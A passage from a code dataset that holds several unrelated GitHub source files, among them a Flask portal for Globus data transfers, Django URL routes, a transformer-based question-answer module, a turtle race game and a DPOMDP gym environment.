request.args.get('next'):\n session['next'] = get_safe_redirect()\n\n return render_template('profile.jinja2')\n elif request.method == 'POST':\n print(\"inside profile post\")\n name = session['name'] = request.form['name']\n email = session['email'] = request.form['email']\n institution = session['institution'] = request.form['institution']\n source_endpoint = session['source_endpoint'] = int(request.form['endpoint'])\n\n database.save_profile(identity_id=session['primary_identity'],\n name=name,\n email=email,\n institution=institution,\n source_endpoint=int(source_endpoint))\n\n flash('Thank you! Your profile has been successfully updated.')\n\n if 'next' in session:\n redirect_to = session['next']\n session.pop('next')\n else:\n redirect_to = url_for('profile')\n\n return redirect(redirect_to)\n\n\n@app.route('/authcallback', methods=['GET'])\ndef authcallback():\n \"\"\"Handles the interaction with Globus Auth.\"\"\"\n # If we're coming back from Globus Auth in an error state, the error\n # will be in the \"error\" query string parameter.\n if 'error' in request.args:\n flash(\"You could not be logged into the portal: \" +\n request.args.get('error_description', request.args['error']))\n return redirect(url_for('home'))\n\n # Set up our Globus Auth/OAuth2 state\n # AUTHCALLBACK_SCHEME=\"https\" allows portal to run behind SSL-terminating\n # reverse proxy or ingress.\n redirect_uri = url_for(\n 'authcallback',\n _external=True,\n _scheme=app.config.get(\"AUTHCALLBACK_SCHEME\")\n )\n\n client = load_portal_client()\n client.oauth2_start_flow(\n redirect_uri,\n refresh_tokens=True,\n requested_scopes=app.config['USER_SCOPES']\n )\n\n # If there's no \"code\" query string parameter, we're in this route\n # starting a Globus Auth login flow.\n if 'code' not in request.args:\n additional_authorize_params = (\n {'signup': 1} if request.args.get('signup') else {})\n\n auth_uri = client.oauth2_get_authorize_url(\n additional_params=additional_authorize_params)\n\n return redirect(auth_uri)\n else:\n # If we do have a \"code\" param, we're coming back from Globus Auth\n # and can start the process of exchanging an auth code for a token.\n code = request.args.get('code')\n tokens = client.oauth2_exchange_code_for_tokens(code)\n\n id_token = tokens.decode_id_token(client)\n session.update(\n tokens=tokens.by_resource_server,\n is_authenticated=True,\n name=id_token.get('name', ''),\n email=id_token.get('email', ''),\n institution=id_token.get('organization', ''),\n primary_username=id_token.get('preferred_username'),\n primary_identity=id_token.get('sub'),\n )\n\n profile = database.load_profile(session['primary_identity'])\n\n if profile:\n name, email, institution, source_endpoint = profile\n\n session['name'] = name\n session['email'] = email\n session['institution'] = institution\n session['source_endpoint'] = source_endpoint\n else:\n return redirect(url_for('profile',\n next=url_for('transfer')))\n\n return redirect(url_for('transfer'))\n\n\n@app.route('/browse', methods=['GET', 'POST'])\n@app.route('/browse/dataset/<dataset_id>', methods=['GET', 'POST'])\n@app.route('/browse/endpoint/<endpoint_id>/<path:endpoint_path>',\n methods=['GET', 'POST'])\n@authenticated\ndef browse(dataset_id=None, endpoint_id=None, endpoint_path=None):\n \"\"\"\n - Get list of files for the selected dataset or endpoint ID/path\n - Return a list of files to a browse view\n\n The target template (browse.jinja2) expects an `endpoint_uri` (if\n available for the endpoint), `target` (either `\"dataset\"`\n or `\"endpoint\"`), and 'file_list' (list of dictionaries) containing\n the following information about each file in the result:\n\n {'name': 'file name', 'size': 'file size', 'id': 'file uri/path'}\n\n If you want to display additional information about each file, you\n must add those keys to the dictionary and modify the browse.jinja2\n template accordingly.\n \"\"\"\n\n if request.method == 'GET':\n assert bool(dataset_id) != bool(endpoint_id and endpoint_path)\n\n if dataset_id:\n try:\n dataset = next(ds for ds in datasets if ds['id'] == dataset_id)\n except StopIteration:\n abort(404)\n\n endpoint_id = app.config['NERSC_ENDPOINT_ID'] if session['source_endpoint'] else app.config['ANL_ENDPOINT_ID']\n endpoint_path = (app.config['NERSC_ENDPOINT_BASE'] + dataset['path']) if session['source_endpoint'] else (app.config['ANL_ENDPOINT_BASE'] + dataset['path'])\n # endpoint_id = app.config['DATASET_ENDPOINT_ID'] \n # endpoint_path = app.config['DATASET_ENDPOINT_BASE'] + dataset['path']\n\n else:\n endpoint_path = '/' + endpoint_path\n\n transfer_tokens = session['tokens']['transfer.api.globus.org']\n\n authorizer = RefreshTokenAuthorizer(\n transfer_tokens['refresh_token'],\n load_portal_client(),\n access_token=transfer_tokens['access_token'],\n expires_at=transfer_tokens['expires_at_seconds'])\n\n transfer = TransferClient(authorizer=authorizer)\n\n try:\n transfer.endpoint_autoactivate(endpoint_id)\n listing = transfer.operation_ls(endpoint_id, path=endpoint_path)\n except TransferAPIError as err:\n flash('Error [{}]: {}'.format(err.code, err.message))\n return redirect(url_for('transfer'))\n\n file_list = [e for e in listing if e['type'] == 'file']\n if dataset_id and 'example' in dataset:\n for e in file_list:\n e['is_example_set'] = (e['name'] in dataset['example'])\n\n ep = transfer.get_endpoint(endpoint_id)\n\n https_server = ep['https_server']\n endpoint_uri = https_server + endpoint_path if https_server else None\n webapp_xfer = 'https://app.globus.org/file-manager?' + \\\n urlencode(dict(origin_id=endpoint_id, origin_path=endpoint_path))\n\n return render_template('browse.jinja2', endpoint_uri=endpoint_uri,\n target=\"dataset\" if dataset_id else \"endpoint\",\n description=(dataset['name'] if dataset_id\n else ep['display_name']),\n mypath=(dataset['path'] if dataset_id\n else None),\n myid=(dataset['id'] if dataset_id\n else None),\n has_example_set=(dataset_id and 'example' in dataset),\n doc_name=(dataset.get(\"doc_name\") if dataset_id else None),\n file_list=file_list, webapp_xfer=webapp_xfer)\n\n if request.method == 'POST':\n if not request.form.get('file'):\n flash('Please select at least one file.')\n return redirect(url_for('browse', dataset_id=dataset_id))\n\n params = {\n 'method': 'POST',\n 'action': url_for('submit_transfer', _external=True,\n _scheme='https'),\n 'filelimit': 0,\n 'folderlimit': 1\n }\n\n browse_endpoint = 'https://app.globus.org/file-manager?{}' \\\n .format(urlencode(params))\n\n session['form'] = {\n 'dirselect': False,\n 'datasets': request.form.getlist('file'),\n 'path': request.form.getlist('path'),\n 'id': request.form.getlist('id')\n }\n\n return redirect(browse_endpoint)\n\n\n@app.route('/transfer', methods=['GET', 'POST'])\n@authenticated\ndef transfer():\n \"\"\"\n - Save the submitted form to the session.\n - Send to Globus to select a destination endpoint using the\n Browse Endpoint helper page.\n \"\"\"\n if request.method == 'GET':\n return render_template('transfer.jinja2', datasets=datasets)\n\n if request.method == 'POST':\n if not request.form.get('dataset'):\n flash('Please select at least one dataset.')\n return redirect(url_for('transfer'))\n\n params = {\n 'method': 'POST',\n 'action': url_for('submit_transfer', _external=True,\n _scheme='https'),\n 'filelimit': 0,\n 'folderlimit': 1\n }\n\n browse_endpoint = 'https://app.globus.org/file-manager?{}' \\\n .format(urlencode(params))\n\n session['form'] = {\n 'dirselect': True,\n 'datasets': request.form.getlist('dataset')\n }\n\n return redirect(browse_endpoint)\n\n\n@app.route('/submit-transfer', methods=['POST'])\n@authenticated\ndef submit_transfer():\n \"\"\"\n - Take the data returned by the Browse Endpoint helper page\n and make a Globus transfer request.\n - Send the user to the transfer status page with the task id\n from the transfer.\n \"\"\"\n browse_endpoint_form = request.form\n\n dirselect = session['form']['dirselect']\n selected = session['form']['datasets']\n if dirselect:\n filtered_datasets = [ds for ds in datasets if ds['id'] in selected]\n else:\n path = session['form']['path']\n myid = session['form']['id']\n filtered_datasets = [{'name':name, 'path': path, 'id': myid}\n for name, path, myid in zip(selected, path, myid)\n ]\n\n transfer_tokens = session['tokens']['transfer.api.globus.org']\n\n authorizer = RefreshTokenAuthorizer(\n transfer_tokens['refresh_token'],\n load_portal_client(),\n access_token=transfer_tokens['access_token'],\n expires_at=transfer_tokens['expires_at_seconds'])\n\n transfer = TransferClient(authorizer=authorizer)\n\n #source_endpoint_id = app.config['DATASET_ENDPOINT_ID']\n #source_endpoint_base = app.config['DATASET_ENDPOINT_BASE']\n source_endpoint_id = app.config['NERSC_ENDPOINT_ID'] if session['source_endpoint'] else app.config['ANL_ENDPOINT_ID']\n source_endpoint_base = app.config['NERSC_ENDPOINT_BASE'] if session['source_endpoint'] else app.config['ANL_ENDPOINT_BASE']\n destination_endpoint_id = browse_endpoint_form['endpoint_id']\n destination_folder = browse_endpoint_form.get('folder[0]')\n\n transfer_data = TransferData(transfer_client=transfer,\n source_endpoint=source_endpoint_id,\n destination_endpoint=destination_endpoint_id,\n label=browse_endpoint_form.get('label'))\n\n for ds in filtered_datasets:\n print(\"printing ds\")\n print(ds)\n if dirselect:\n source_path = source_endpoint_base + ds['path']\n else:\n source_path = source_endpoint_base + ds['path'] + \"/\" + ds['name']\n\n dest_path = browse_endpoint_form['path']\n\n if destination_folder:\n dest_path += destination_folder + '/'\n\n if dirselect:\n dest_path += ds['path'] + '/'\n else:\n dest_path += ds['path'] + '/' + ds['name']\n\n transfer_data.add_item(source_path=source_path,\n destination_path=dest_path,\n recursive=dirselect)\n\n transfer.endpoint_autoactivate(source_endpoint_id)\n transfer.endpoint_autoactivate(destination_endpoint_id)\n task_id = transfer.submit_transfer(transfer_data)['task_id']\n\n flash('Transfer request submitted successfully. Task ID: ' + task_id)\n\n return(redirect(url_for('transfer_status', task_id=task_id)))\n\n\n@app.route('/status/<task_id>', methods=['GET'])\n@authenticated\ndef transfer_status(task_id):\n \"\"\"\n Call Globus to get status/details of transfer with\n task_id.\n\n The target template (tranfer_status.jinja2) expects a Transfer API\n 'task' object.\n\n 'task_id' is passed to the route in the URL as 'task_id'.\n \"\"\"\n transfer_tokens = session['tokens']['transfer.api.globus.org']\n\n authorizer = RefreshTokenAuthorizer(\n transfer_tokens['refresh_token'],\n load_portal_client(),\n access_token=transfer_tokens['access_token'],\n expires_at=transfer_tokens['expires_at_seconds'])\n\n transfer = TransferClient(authorizer=authorizer)\n task = transfer.get_task(task_id)\n\n return render_template('transfer_status.jinja2', task=task)\n\n","repo_name":"LSSTDESC/desc-data-portal","sub_path":"web/portal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":15847,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"92"} +{"seq_id":"17978867552","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"create\", views.create, name=\"create\"),\n path(\"random\", views.random_entry, name=\"random\"),\n path(\"wiki/not-found\", views.not_found, name=\"404\"),\n path(\"wiki/<str:name>\", views.show, name=\"show\"),\n path(\"wiki/<str:name>/edit\", views.edit, name=\"edit\")\n]\n","repo_name":"plovinicius/cs50w-wiki","sub_path":"encyclopedia/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"33402254337","text":"\nimport os\n\nclass Screen:\n def __init__(self):\n print(\"screen module initiailized\")\n self.brightness_interface = \"/sys/class/backlight/rpi_backlight/brightness\"\n self.is_on = True\n\n def change_brightness(self, value) -> bool:\n \"\"\"write an uint8 value to brightness interface\"\"\"\n with open(self.brightness_interface, 'w') as f:\n f.seek(os.SEEK_END)\n pos = f.tell()\n f.truncate(pos)\n f.write(str(value))\n return True\n\n @property\n def is_on(self) -> bool:\n return self.__is_on\n\n @is_on.setter\n def is_on(self, value : bool) -> bool:\n if type(value) is not bool:\n raise TypeError\n self.__is_on = value\n return self.__is_on\n \n\n\n\nif __name__ == \"__main__\":\n print(\"Running test on screen brightness\")\n s = Screen()\n s.change_brightness(100)","repo_name":"Spice-Weasel/tkinter-slideshow","sub_path":"screen.py","file_name":"screen.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"12545810082","text":"\"\"\"add start_time field in rooms\n\nRevision ID: 4b8e19d6837f\nRevises: 66145020275c\nCreate Date: 2020-03-25 09:41:14.423042\n\n\"\"\"\nimport sqlalchemy as sa\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = '4b8e19d6837f'\ndown_revision = '66145020275c'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.add_column('rooms', sa.Column('start_time', sa.BigInteger(), nullable=True))\n\n\ndef downgrade():\n op.drop_column('rooms', 'start_time')\n","repo_name":"super1-chen/gamecenter","sub_path":"gamecenter/db/alembic/versions/4b8e19d6837f_add_start_time_field_in_rooms.py","file_name":"4b8e19d6837f_add_start_time_field_in_rooms.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"33005223692","text":"import random\n\ndef random_subset(n, k):\n mapping = {}\n\n for i in range(k):\n randindex = random.randint(i, n-1)\n m1 = mapping.get(randindex)\n m2 = mapping.get(i)\n\n if m1 == None and m2 == None:\n mapping[randindex] = i\n mapping[i] = randindex\n elif m1 == None and m2 != None:\n mapping[randindex] = m2\n mapping[i] = randindex\n elif m1 != None and m2 == None:\n mapping[i] = m1\n mapping[randindex] = i\n else:\n mapping[i] = m1\n mapping[randindex] = m2\n\n return list(mapping.values())[:k]\n\nn = int(input('Enter n: '))\nk = int(input('Enter k: '))\nprint(random_subset(n, k))\n","repo_name":"mismayil/epi","sub_path":"random_subset.py","file_name":"random_subset.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"34829525296","text":"\"\"\"\r\n# 14. 02. 15650. N과 M 2\r\n# DATE SOLVED: 22. 01. 05\r\n\r\n# COMMENTS:\r\n 자연수 N과 M이 주어졌을 때 중복 없이 M개를 고른 수열. \r\n 오름차순.\r\n\"\"\"\r\n\r\nimport sys\r\nN, M = map(int, sys.stdin.readline().split())\r\n\r\ndef DFS(array, k):\r\n if len(array) == M:\r\n print(\" \".join(map(str, array)))\r\n return\r\n\r\n for i in range(k, N + 1):\r\n if i not in array:\r\n array.append(i)\r\n DFS(array, i)\r\n array.pop()\r\n\r\narray = []\r\n\r\nDFS(array, 1)","repo_name":"tiobi/algorithm_study","sub_path":"BOJ/14.백트래킹/14.02.15650.N과M2.py","file_name":"14.02.15650.N과M2.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"25667027520","text":"import maya.cmds as cmds\nimport chModules.retargetTool.functions as fnc\n\ndef clearLocalData( target ):\n \n orientNodeCons = cmds.listConnections( target, type='retargetOrientNode' )\n transNodeCons = cmds.listConnections( target, type='retargetTransNode' )\n \n retargetNodes = []\n \n if orientNodeCons:\n retargetNodes.append( orientNodeCons[0] )\n if transNodeCons:\n retargetNodes.append( transNodeCons[0] )\n \n if retargetNodes:\n \n for retargetNode in retargetNodes:\n fnc.clearArrayElement( retargetNode+'.localData' )","repo_name":"kimsung9k/mayadev","sub_path":"maya_tools_backup/chRig/python/chModules/retargetTool/localEdit/localConnect.py","file_name":"localConnect.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"92"} +{"seq_id":"14220889304","text":"from transformers import pipeline\nimport tensorflow as tf\nimport transformers\nimport numpy as np\n#from googletrans import Translator\nimport pandas as pd \nimport re\nfrom google_trans_new import google_translator \n\nmax_length = 32 # Maximum length of input sentence to the model.\nbatch_size = 32\nepochs = 2\n\n# Labels in our dataset.\nlabels = [\"contradiction\", \"entailment\", \"neutral\"]\n\n\n\n\n\nclass BertSemanticDataGenerator(tf.keras.utils.Sequence):\n \"\"\"Generates batches of data.\n\n Args:\n sentence_pairs: Array of premise and hypothesis input sentences.\n labels: Array of labels.\n batch_size: Integer batch size.\n shuffle: boolean, whether to shuffle the data.\n include_targets: boolean, whether to incude the labels.\n\n Returns:\n Tuples `([input_ids, attention_mask, `token_type_ids], labels)`\n (or just `[input_ids, attention_mask, `token_type_ids]`\n if `include_targets=False`)\n \"\"\"\n\n def __init__(\n self,\n sentence_pairs,\n labels,\n batch_size=batch_size,\n shuffle=True,\n include_targets=True,\n truncation = True\n ):\n self.sentence_pairs = sentence_pairs\n self.labels = labels\n self.shuffle = shuffle\n self.batch_size = batch_size\n self.include_targets = include_targets\n # Load our BERT Tokenizer to encode the text.\n # We will use base-base-uncased pretrained model.\n self.tokenizer = transformers.BertTokenizer.from_pretrained(\n \"bert-base-uncased\", do_lower_case=True\n )\n self.indexes = np.arange(len(self.sentence_pairs))\n self.on_epoch_end()\n\n def __len__(self):\n # Denotes the number of batches per epoch.\n return len(self.sentence_pairs) // self.batch_size\n\n def __getitem__(self, idx):\n # Retrieves the batch of index.\n indexes = self.indexes[idx * self.batch_size : (idx + 1) * self.batch_size]\n sentence_pairs = self.sentence_pairs[indexes]\n\n # With BERT tokenizer's batch_encode_plus batch of both the sentences are\n # encoded together and separated by [SEP] token.\n encoded = self.tokenizer.batch_encode_plus(\n sentence_pairs.tolist(),\n add_special_tokens=True,\n max_length=max_length,\n return_attention_mask=True,\n return_token_type_ids=True,\n pad_to_max_length=True,\n return_tensors=\"tf\",\n truncation=True\n )\n #print(encoded)\n # Convert batch of encoded features to numpy array.\n input_ids = np.array(encoded[\"input_ids\"], dtype=\"int32\")\n attention_masks = np.array(encoded[\"attention_mask\"], dtype=\"int32\")\n token_type_ids = np.array(encoded[\"token_type_ids\"], dtype=\"int32\")\n\n # Set to true if data generator is used for training/validation.\n if self.include_targets:\n labels = np.array(self.labels[indexes], dtype=\"int32\")\n return [input_ids, attention_masks, token_type_ids], labels\n else:\n return [input_ids, attention_masks, token_type_ids]\n\n def on_epoch_end(self):\n # Shuffle indexes after each epoch if shuffle is set to True.\n if self.shuffle:\n np.random.RandomState(42).shuffle(self.indexes)\n\ndef create_model():\n #strategy = tf.distribute.MirroredStrategy()\n\n #with strategy.scope():\n # Encoded token ids from BERT tokenizer.\n input_ids = tf.keras.layers.Input(\n shape=(max_length,), dtype=tf.int32, name=\"input_ids\"\n )\n # Attention masks indicates to the model which tokens should be attended to.\n attention_masks = tf.keras.layers.Input(\n shape=(max_length,), dtype=tf.int32, name=\"attention_masks\"\n )\n # Token type ids are binary masks identifying different sequences in the model.\n token_type_ids = tf.keras.layers.Input(\n shape=(max_length,), dtype=tf.int32, name=\"token_type_ids\"\n )\n # Loading pretrained BERT model.\n\n bert_model = transformers.TFBertModel.from_pretrained(\"bert-base-uncased\")\n # Freeze the BERT model to reuse the pretrained features without modifying them.\n bert_model.trainable = False\n\n sequence_output, pooled_output = bert_model(\n input_ids, attention_mask=attention_masks, token_type_ids=token_type_ids\n )\n # Add trainable layers on top of frozen layers to adapt the pretrained features on the new data.\n bi_lstm = tf.keras.layers.Bidirectional(\n tf.keras.layers.LSTM(64, return_sequences=True)\n )(sequence_output)\n # Applying hybrid pooling approach to bi_lstm sequence output.\n avg_pool = tf.keras.layers.GlobalAveragePooling1D()(bi_lstm)\n max_pool = tf.keras.layers.GlobalMaxPooling1D()(bi_lstm)\n concat = tf.keras.layers.concatenate([avg_pool, max_pool])\n dropout = tf.keras.layers.Dropout(0.3)(concat)\n output = tf.keras.layers.Dense(3, activation=\"softmax\")(dropout)\n model = tf.keras.models.Model(\n inputs=[input_ids, attention_masks, token_type_ids], outputs=output\n )\n\n model.compile(\n optimizer=tf.keras.optimizers.Adam(),\n loss=\"categorical_crossentropy\",\n metrics=[\"acc\"],\n )\n return model\n\n\ndef check_similarity(sentence1, sentence2,model_question_answer):\n sentence_pairs = np.array([[str(sentence1), str(sentence2)]])\n test_data = BertSemanticDataGenerator(\n sentence_pairs, labels=None, batch_size=1, shuffle=False, include_targets=False,\n )\n\n proba = model_question_answer.predict(test_data)[0]\n idx = np.argmax(proba)\n proba = f\"{proba[idx]: .2f}%\"\n pred = labels[idx]\n return pred, proba\n\ndef question_answer(text,model_question_answer,fichier):\n translated = translate(text,src='fr', dest='en')\n liste_similarity=[]\n #print(\"translated\",translated)\n for i in range(len(fichier)):\n if len(liste_similarity) <3:\n pred,proba = check_similarity(fichier.iloc[i][0],translated,model_question_answer)\n #print(\"pred :\",pred,\"proba\",proba)\n if pred == \"entailment\":\n all_reponses = fichier.iloc[i][1]\n temp_liste = all_reponses.split(\"/\")\n for temp in temp_liste:\n liste_similarity.append(temp)\n else:\n return liste_similarity\n print(liste_similarity)\n return liste_similarity\n\n\n\n\n\ndef generate_sentences_french_gpt2(debut_phrase,num_return_sequences=1,length=20,temperature=1):\n response = french_generator(debut_phrase,num_return_sequences=1,max_length=length)\n liste = []\n for res in response:\n liste.append(res[\"generated_text\"])\n return liste\n\ndef translate(texte,src=\"en\",dest=\"fr\"):\n translator = google_translator() \n translate_text = translator.translate(texte,lang_tgt=dest) \n return translate_text\n\ndef generate_sentences_english_gpt2(debut_phrase,english_generator,num_return_sequences,length,top_p):\n debut_phrase = translate(debut_phrase,'fr',dest = 'en')\n\n response_debut_phrase = english_generator(debut_phrase,num_return_sequences=num_return_sequences,max_length=length,top_p=top_p,top_k=15,do_sample=True)\n liste = []\n for res in response_debut_phrase:\n print(\"res\",res)\n temp = translate(res[\"generated_text\"],'en',dest = 'fr')\n temp = truncate(temp)\n liste.append(temp)\n return liste\n\ndef truncate(string):\n strin_clean = re.sub('\\.(.*)', '.', string)\n strin_clean = re.sub('\\?(.*)', '?', strin_clean)\n strin_clean = re.sub('\\!(.*)', '!', strin_clean)\n return strin_clean\n\n\n#----------Load model to finish sentences gpt-2 french fine tune----------\n#french_generator = pipeline('text-generation',model='ml/modeles/gpt2-fine-tune', tokenizer='camembert-base')\n\n#----------Load model to finish sentences gpt2-english not fine tune----------\ndef load_english_generator():\n english_generator = pipeline('text-generation', model='gpt2')\n return english_generator\n\n#----------Load model for questions answer----------\ndef load_bert_model():\n model = create_model()\n path = \"ml/modeles/bert-question-reponses/weights\"\n model.load_weights(path)\n return model\n\ndef load_file():\n fichier = pd.read_csv(\"ml/dataset_questions_reponses.txt\", sep=\";\")\n return fichier","repo_name":"Nicolas-Thomazo/Alis_project","sub_path":"backend/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"7312022424","text":"#Event Listners\n\n#from turtle import Turtle, Screen\n#ted=Turtle()\n#screen=Screen()\n#def move_fd():\n# ted.fd(10)\n#screen.listen()\n#screen.onkey(fun=move_fd,key=\"a\")\n#screen.exitonclick()\n\n#Etch-A Sketch app\n\n#from turtle import Turtle, Screen\n#ted=Turtle()\n#screen=Screen()\n#def move_right():\n# ted.fd(10)\n#def move_up():\n# ted.left(10)\n#def move_down():\n# ted.right(10)\n#def move_left():\n# ted.backward(10)\n#def Clear():\n# ted.clear()\n# ted.pu()\n# ted.home()\n#screen.listen()\n#screen.onkey(fun=move_right,key=\"d\")\n#screen.onkey(fun=move_left,key=\"a\")\n#screen.onkey(fun=move_up,key=\"w\")\n#screen.onkey(fun=move_down,key=\"x\")\n#screen.onkey(fun=Clear,key=\"c\")\n#screen.exitonclick()\n\n\nfrom turtle import Turtle, Screen\nimport random\nscreen=Screen()\nscreen.setup(500, 400)\ncolors=[\"red\",\"blue\",\"green\",\"yellow\",\"orange\",\"purple\"]\ny_coordinates=[60,30,0,-30,-60,-90]\nall_turtles=[]\nis_race=False\nuser_bet=screen.textinput(title=\"Make your bet.\", prompt=\"Which turtle will win the race? Enter a color: \")\nprint(user_bet)\nfor turtle_index in range(0,6):\n new_turtle = Turtle(shape=\"turtle\")\n new_turtle.color(colors[turtle_index])\n new_turtle.pu()\n new_turtle.goto(x=-230, y=y_coordinates[turtle_index])\n all_turtles.append(new_turtle)\nif user_bet:\n is_race=True\nwhile is_race:\n for turtle in all_turtles:\n if turtle.xcor()>230:\n is_race=False\n winner_color=turtle.pencolor()\n if user_bet==winner_color:\n print(f\"You've won and {winner_color} is the winning turtle.\")\n else:\n print(f\"You've lost and {winner_color} is the winning turtle.\")\n random_distance=random.randint(0,10)\n turtle.fd(random_distance)\nscreen.exitonclick()\n","repo_name":"Abcacode4r/pythonProject5","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"73033600939","text":"import os\nfrom rl_parsers.dpomdp import parse\nimport numpy as np\nimport gym\nfrom gym.utils import seeding\nfrom gym import spaces\n\nclass DPOMDP(gym.Env):\n \"\"\"Environment specified by DPOMDP file\"\"\"\n def __init__(self, path, episodic=False, seed=None):\n debug=False\n #debug = True if 'skewed' in path else False\n self.episodic = episodic\n self.seed(seed)\n with open(path) as f:\n model = parse(f.read(), debug=debug)\n\n self.discount = model.discount\n self.agents = len(model.agents)\n self.state_space = spaces.Discrete(len(model.states))\n self.action_space = [spaces.Discrete(len(aAct)) for aAct in model.actions] # Space for each agent\n self.observation_space = [spaces.Discrete(len(aObs)) for aObs in model.observations] # Obs space for each agent\n self.reward_range = model.R.min(), model.R.max()\n if model.start is None:\n self.start = np.full(self.state_space.n, 1 / self.state_space.n)\n else:\n self.start = model.start\n\n # Start-state, agent actions, end state\n self.T = model.T.transpose(self.agents, *(np.arange(self.agents)), self.agents+1).copy()\n # Start, agent actions, end, agent observations\n self.O = np.stack([model.O] * self.state_space.n)\n # Start-state, agent actions, end state, agent observations\n self.R = model.R.transpose(self.agents, *(np.arange(self.agents)), self.agents+1, *(np.arange(self.agents)+self.agents+2)).copy()\n\n if episodic:\n self.D = model.reset.T.copy() # only if episodic\n\n self.state = None\n\n def seed(self, seed):\n self.np_random, seed_ = seeding.np_random(seed)\n return [seed_]\n\n def reset(self):\n self.state = self.np_random.multinomial(1, self.start).argmax().item()\n\n # Take an nparray or tuple of actions, not just 1\n def step(self, actions):\n assert self.state is not None, 'State has not been initialized'\n if isinstance(actions, (list, tuple)):\n assert len(actions) == self.agents, 'Must provide joint action'\n else:\n assert actions.shape[0] == self.agents, 'Must provide joint action'\n\n state1 = self.np_random.multinomial(\n 1, self.T[self.state, (*actions)]).argmax().item()\n # Need to get the joint obs. The last indices are obs for agents 1, 2, etc\n # Flatten those indices (they sum to 1), draw a number, unflatten\n # So obs is a tuple of length (numAgents)\n obs = np.unravel_index(self.np_random.multinomial(1, self.O[self.state, (*actions), state1].flatten()).argmax(),\n tuple([oSpace.n for oSpace in self.observation_space]))\n reward = self.R[self.state, (*actions), state1, (*obs)].item()\n\n if self.episodic:\n done = self.D[self.state, (*actions)]\n else:\n done = False\n\n if done:\n self.state = None\n else:\n self.state = state1\n\n return obs, reward, done, {}\n","repo_name":"shrivastava-piyush/G-DICE","sub_path":"gym_dpomdps/gym_dpomdps/envs/dpomdp.py","file_name":"dpomdp.py","file_ext":"py","file_size_in_byte":3053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"24919783095","text":"#!/usr/bin/env python\n\n\"\"\"\nUsage:\n\n ./ens2json infile\n\nAim:\n\nCreate useful information about ensembles in JSON format. This is intended\nfor internal/CXC use, so there is no guarantee on the format of if this\ninformation is valid. Output is to the screen.\n\n\"\"\"\n\nimport json\n\nfrom coords.utils import calculate_nominal_position\n\n\ndef stk2coord(stack):\n \"\"\"Get the stack center from the name\"\"\"\n\n assert stack.startswith('acisfJ') or stack.startswith('hrcfJ'), \\\n stack\n assert stack.endswith('_001'), stack\n\n idx = stack.find('J')\n cstr = stack[idx + 1:-4]\n\n sign = cstr[7]\n assert sign in \"mp\", stack\n rstr = cstr[:7]\n dstr = cstr[8:]\n\n rah = int(rstr[0:2])\n ram = int(rstr[2:4])\n ras = int(rstr[4:]) / 10\n ra = 15.0 * (rah + (ram + (ras / 60.0)) / 60.0)\n\n decd = int(dstr[0:2])\n decm = int(dstr[2:4])\n decs = int(dstr[4:])\n dec = decd + (decm + (decs / 60.0)) / 60.0\n\n if sign == 'm':\n dec *= -1\n\n return [ra, dec]\n\n\ndef coords2center(cs):\n \"\"\"Convert a list of ra,dec values to a 'center'\n\n Just \"average\" the positions, but we do have at least one\n ensemble which straddles ra=0/360, so can not employ a\n cartesian approximation.\n\n Parameters\n ----------\n cs : sequence of (ra, dec) pairs\n The RA and Dec values are in decimal degrees\n\n Returns\n -------\n obj : dict\n Has keys ra and dec\n\n \"\"\"\n\n ras = [p[0] for p in cs]\n decs = [p[1] for p in cs]\n ra, dec = calculate_nominal_position(ras, decs)\n return {'ra': ra, 'dec': dec}\n\n\ndef clean(ensemble):\n \"\"\"Grab the actual ensemble value.\n\n This makes it a little easier for me downstream.\n \"\"\"\n\n assert ensemble.startswith('ens'), ensemble\n assert ensemble.endswith('00_001'), ensemble\n return int(ensemble[3:-6])\n\n\ndef convert(infile):\n\n store = {}\n coords = []\n with open(infile, 'r') as fh:\n for l in fh.readlines():\n l = l.strip()\n if l == '' or l.startswith('#'):\n continue\n\n toks = l.split()\n assert len(toks) == 4, l\n nstk = int(toks[1])\n ctr = int(toks[2])\n stk = toks[3]\n\n if ctr == 1:\n assert coords == []\n\n coords.append(stk2coord(stk))\n\n if ctr == nstk:\n center = coords2center(coords)\n ens = clean(toks[0])\n store[ens] = center\n coords = []\n\n assert coords == []\n print(json.dumps(store))\n\n\nif __name__ == \"__main__\":\n\n import sys\n if len(sys.argv) != 2:\n sys.stderr.write(\"Usage: {} infile\\n\".format(sys.argv[0]))\n sys.exit(1)\n\n convert(sys.argv[1])\n","repo_name":"cxcsds/cscwwt","sub_path":"code/ens2json.py","file_name":"ens2json.py","file_ext":"py","file_size_in_byte":2708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"1193108839","text":"import os \nimport sys \nsys.path.insert(0, os.path.abspath('../../my_bot'))\n\n# Configuration file for the Sphinx documentation builder.\n#\n# For the full list of built-in configuration values, see the documentation:\n# https://www.sphinx-doc.org/en/master/usage/configuration.html\n\n# -- Project information -----------------------------------------------------\n# https://www.sphinx-doc.org/en/master/usage/configuration.html#project-information\n\nproject = 'game'\ncopyright = '2023, linseypy, rivenmau, 